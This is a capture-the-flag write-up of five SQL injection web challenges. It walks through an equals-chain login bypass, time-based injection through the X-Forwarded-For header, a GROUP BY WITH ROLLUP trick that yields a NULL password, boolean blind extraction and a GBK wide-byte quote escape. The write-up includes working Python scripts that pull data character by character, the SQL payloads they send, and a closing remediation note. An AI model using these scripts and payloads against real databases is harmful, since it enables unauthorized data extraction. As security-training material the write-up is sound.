【1】 The challenge claims that everything is filtered, but testing shows that the double quote, and, left, right and similar keywords get through. The important observation is that the page returned is the same whether or not the injected SQL is valid; whatever was tried, the result was identical, so error-based probing tells you nothing.

So it can only be a logic bypass. The verification query is presumably something like
select * from *** where username ="" and password="";
Neither a username nor a password is known at this point. Stuck, I stared at it for a long time.

Bypassed successfully with
username=hello"=" & password = hello"="
The query becomes ... where username ="hello"="" and password="hello"="". MySQL evaluates a chain of = from left to right, so username="hello" is computed first and yields 0 (no such user); 0="" is then true, because the empty string is cast to the number 0 for the comparison. Both sides of the AND are true for every row, the query returns a result, and the flag comes back.
【2】 XFF time-based injection, nothing filtered
' or sleep(10) and ''='
The response is delayed, so the X-Forwarded-For header is injectable.
' or sleep((select length(flag) from flag)=32) and ''='
sleep() is handed the result of a comparison, so it sleeps 1 s when the length is 32 and 0 s otherwise; this confirms the flag is 32 characters long.
Straight to the code:
#coding:utf-8
"""
@author: elope
"""
import requests

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzxcvbnm."
flag = ''
for j in range(1, 33):          # substring() positions are 1-based; the flag is 32 characters
    for i in maystr:
        header = {
            # dump the database name:
            # "X-Forwarded-For": "' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)
            # dump the table names:
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)
            # dump the column names (0x666C6167 = 'flag'):
            # "X-Forwarded-For": "' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)
            # dump the record:
            "X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j, i)
        }
        try:
            res = requests.get(url, headers=header, timeout=4).text
        except requests.exceptions.RequestException:
            # sleep(5) outlasted the 4 s timeout: this character is correct
            flag += i
            print(flag)
            break
        # print(res)
This version confirms each hit with a second request; it is slower, but a little more accurate.
import requests
import time

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr = "0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm."
flag = ''
for i in range(1, 33):
    for j in maystr:
        headers = {"X-Forwarded-For": "' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i, j)}
        starttime = time.time()
        res = requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            # confirm with a second request so a slow round trip is not taken for sleep(15);
            # the timer must be restarted, otherwise the first delay makes this check always pass
            starttime = time.time()
            res = requests.get(url, headers=headers)
            if time.time() - starttime > 10:
                flag += j
                print(flag)
                break
It produces the result directly.

【3】 Forcing the password to be empty
Straight to the code. This is the challenge's own source (source.txt):
<?php
error_reporting(0);
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){
        print "水可載舟,亦可賽艇!";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql);
if (mysql_num_rows($query) == 1) {
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可賽艇!";
    }
}else{
    print "一顆賽艇!";
}
mysql_close($con);
?>
Bypassing the username check is easy: uname = ' or 1=1 limit 1# makes the query return exactly one row, which is what mysql_num_rows($query) == 1 requires. (The filter blocks commas, so "limit 1,1" is unavailable; "limit 1 offset 1" is the comma-free form.)
But the password we submit has to equal the one read from that row, which is circular: if we knew it we would already be in. Look at the check:
if($key['pwd'] == $_POST['pwd'])
This is PHP's loose comparison. Instead of guessing the stored password, we can arrange for the row that is read back to have a NULL pwd: NULL == '' is true in PHP, and an empty pwd field is exactly what we can submit.
First, check how many users there are, using limit/offset in the injection:
' or 1=1 limit 1 offset 1#    → normal response (a second row exists)
' or 1=1 limit 1 offset 2#    → the no-row response "一顆賽艇!" (no third row)
So the table holds exactly two rows.
Now a row whose pwd is NULL has to be produced. GROUP BY pwd WITH ROLLUP does this without any parentheses or commas: it appends a super-aggregate row in which the grouped column is NULL. The two users have different passwords, so the grouped result is two rows plus the rollup row, and limit 1 offset 2 selects exactly the rollup row: mysql_num_rows is 1 and $key['pwd'] is NULL.

Success. Submit
uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(empty)
and the flag is returned. (Caveat: on MySQL 5.7 and later with ONLY_FULL_GROUP_BY in sql_mode, SELECT * grouped by pwd alone is rejected; the trick relies on the permissive settings this old mysql_*-based code ran under.)
【4】 Plain boolean-based blind injection, no tricks
Just the code:
import requests

flag = ""
for i in range(1, 30):
    for j in range(33, 127):        # printable ASCII
        url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(j) + ",1,0)%23"
        res = requests.get(url)
        if 'Hello' in res.text:     # the page greets the user only when the condition is true
            flag += chr(j)
            print(flag)
            break
【5】 An NJCTF problem
Spaces are filtered, and the back end uses a double-byte (GBK) character set. Single quotes are escaped, and double quotes are treated as ordinary characters, so the comparison value is sent as a hex literal instead of a quoted string. The %df' prefix turns the escaping backslash into the trail byte of a two-byte GBK character, which leaves the quote live; parentheses take the place of spaces. MySQL compares a hex literal as a binary string, so the match is case-sensitive, which matters because the candidate set contains both upper and lower case.
import binascii
import requests

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23"
payload = ''
for i in range(1, 35):
    for c in s:
        # the candidate is compared as a hex literal, so no quote is needed in the payload
        url = u.format(pos=i, c=binascii.hexlify(c.encode()).decode())
        r = requests.get(url)
        if 'showContent' in r.text:     # the content block is rendered only when the condition holds
            payload += c
            print(payload)
            break
    if payload and payload[-1] == '}':  # closing brace of the flag: done
        break
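Added example for 【5】, not from the writeup: it re-implements PHP's addslashes() byte-by-byte escaping and decodes the result as GBK to show why the escaping backslash disappears into a two-byte character after %df, and it builds the space-free, quote-free probe the script above sends. The table and column names in server_side_sql() are assumptions; the challenge's real query is not shown on the page.

```python
"""Wide-byte (GBK) quote escape and quote-free comparison, as used in challenge 5.

Added example, not part of the writeup. addslashes() re-implements PHP's
byte-oriented escaping so its effect can be seen offline; the GBK decode
models a MySQL connection whose character set is gbk. The query shape in
server_side_sql() is an assumption: the page does not show the real query.
"""
import binascii


def addslashes(raw: bytes) -> bytes:
    """PHP addslashes(): a backslash before ' " \\ and NUL, byte by byte,
    with no knowledge of multi-byte characters."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(raw: bytes) -> bool:
    """True if an unescaped single quote remains after escaping + GBK decoding.
    With a 0xDF lead byte in front of the quote, the inserted 0x5C backslash
    becomes the trail byte of a two-byte GBK character (0xDF5C) and the quote
    that follows it is live again."""
    text = addslashes(raw).decode("gbk", errors="replace")
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def server_side_sql(key_param: bytes) -> str:
    """The query as MySQL sees it after PHP escapes the URL-decoded parameter
    and the gbk connection decodes it. Table and column names are assumptions."""
    value = addslashes(key_param).decode("gbk", errors="replace")
    return f"SELECT * FROM content WHERE `key`='{value}'"


def build_payload(pos: int, candidate: str) -> str:
    """Probe for challenge 5, true when character `pos` (1-based) of the flag
    equals `candidate`. No spaces: parentheses separate tokens. No quotes: the
    literal is hex, and MySQL compares a hex literal as a binary string, so the
    match is case-sensitive, which the mixed-case candidate set depends on."""
    hexed = binascii.hexlify(candidate.encode()).decode()
    return f"a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{hexed}%23"


if __name__ == "__main__":
    print(quote_survives(b"a'"), quote_survives(b"a\xdf'"))   # False True
    print(server_side_sql(b"a\xdf'||1=1#"))
    print(build_payload(3, "g"))
```

The escaping itself is not the bug; the mismatch is. addslashes() (and mysql_escape_string, or mysql_real_escape_string on a connection whose charset it does not know) inserts 0x5C without regard to GBK lead bytes. The fix is prepared statements, or at minimum setting the connection charset through the driver (mysql_set_charset()) so that escaping is charset-aware.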
